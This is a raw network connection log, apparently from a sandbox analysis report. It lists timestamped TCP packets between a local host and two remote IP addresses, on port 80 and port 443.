                                                                                                                                                                                              Nov 24, 2024 13:39:31.368391037 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.368447065 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.368567944 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.369334936 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.369388103 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.369465113 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.370172024 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.370276928 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.370333910 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.371071100 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.371141911 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.371182919 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.371896982 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.371951103 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.371954918 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.372766972 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.372824907 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.372901917 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.373716116 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.373779058 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.373833895 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.374527931 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.374627113 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.374643087 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.375431061 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.375490904 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.375544071 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.376285076 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.376342058 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.376410961 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.377176046 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.377227068 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.377322912 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.378058910 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.378159046 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.378206968 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.378957033 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.379018068 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.379137039 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.379821062 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.380032063 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.380083084 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.380646944 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.380714893 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.380794048 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.381539106 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.381589890 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.381653070 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.382478952 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.382514954 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.382564068 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.396411896 CET4434976013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.396588087 CET4434976013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.396662951 CET49760443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:31.398164988 CET49760443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:31.398217916 CET4434976013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.398255110 CET49760443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:31.398271084 CET4434976013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.401622057 CET49765443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:31.401664972 CET4434976513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.401746988 CET49765443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:31.401921988 CET49765443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:31.401936054 CET4434976513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.405225992 CET4434976113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.405301094 CET4434976113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.405503035 CET49761443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:31.405535936 CET49761443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:31.405553102 CET4434976113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.405564070 CET49761443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:31.405569077 CET4434976113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.407334089 CET49766443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:31.407372952 CET4434976613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.407423973 CET49766443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:31.407529116 CET49766443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:31.407546043 CET4434976613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.506174088 CET4434976213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.506253958 CET4434976213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.506333113 CET49762443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:31.506485939 CET49762443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:31.506515980 CET4434976213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.506556988 CET49762443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:31.506571054 CET4434976213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.508974075 CET49767443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:31.508999109 CET4434976713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.509877920 CET49767443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:31.509998083 CET49767443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:31.510010958 CET4434976713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.511610031 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.511720896 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.512005091 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.512058973 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.512149096 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.512968063 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.513025045 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.513034105 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.513763905 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.513818026 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.550359011 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.550487995 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.550611973 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.550787926 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.550915956 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.550950050 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.550975084 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.551000118 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.551779985 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.551898956 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.551955938 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.552699089 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.552788973 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.552849054 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.553550959 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.553606033 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.553653002 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.554438114 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.554563999 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.554610968 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.555332899 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.555427074 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.556190014 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.556236982 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.556314945 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.557058096 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.557106018 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.557187080 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.557231903 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.557984114 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.558119059 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.558166981 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.558798075 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.558967113 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.559014082 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.559689999 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.559837103 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.560585022 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.560648918 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.560759068 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.561471939 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.561532021 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.561558962 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.561845064 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.562400103 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.562563896 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.562634945 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.563225985 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.563366890 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.563424110 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.564102888 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.564240932 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.564296961 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.565007925 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.565124035 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.565180063 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.565877914 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.565958023 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.566019058 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.566719055 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.566823959 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.566883087 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.567627907 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.567739964 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.568644047 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.568702936 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.568846941 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.569411039 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.569472075 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.569487095 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.569835901 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.570287943 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.570436954 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.570502043 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.571135998 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.571249962 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.571305037 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.572060108 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.572180033 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.572232962 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.572958946 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.573158026 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.573213100 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.573779106 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.573900938 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.574670076 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.574724913 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.574774981 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.575536966 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.575597048 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.575637102 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.575684071 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.576409101 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.576524973 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.576575041 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.577409983 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.577497005 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.577548027 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.578156948 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.578305006 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.578352928 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.579046965 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.579157114 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.579202890 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.579927921 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.580073118 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.580178022 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.580801010 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.580916882 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.581001043 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.581674099 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.581789017 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.581844091 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.582572937 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.582628012 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.582675934 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.583472013 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.583662033 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.583776951 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.584362030 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.584556103 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.584666014 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.585197926 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.585278034 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.585323095 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.586069107 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.586210012 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.586256981 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.587091923 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.587222099 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.587269068 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.587821007 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.587928057 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.587975025 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.588840961 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.588983059 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.589027882 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.589772940 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.589895964 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.589941978 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.590749979 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.590874910 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.590919971 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.591582060 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.591685057 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.591778994 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.592350960 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.592482090 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.592528105 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.593154907 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.593223095 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.593266964 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.722073078 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.722170115 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.722240925 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.722560883 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.722711086 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.722754002 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.723352909 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.723422050 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.723469973 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.724211931 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.760893106 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.760971069 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.760978937 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.761331081 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.761373043 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.761379004 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.762260914 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.762306929 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.762347937 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.763082027 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.763130903 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.763176918 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.763986111 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.764027119 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.764051914 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.764834881 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.764878035 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.765017986 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.765749931 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.765768051 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.765784979 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.766594887 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.766638041 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.766674042 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.767482042 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.767517090 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.767522097 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.768374920 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.768416882 CET4975280192.168.2.6185.215.113.16
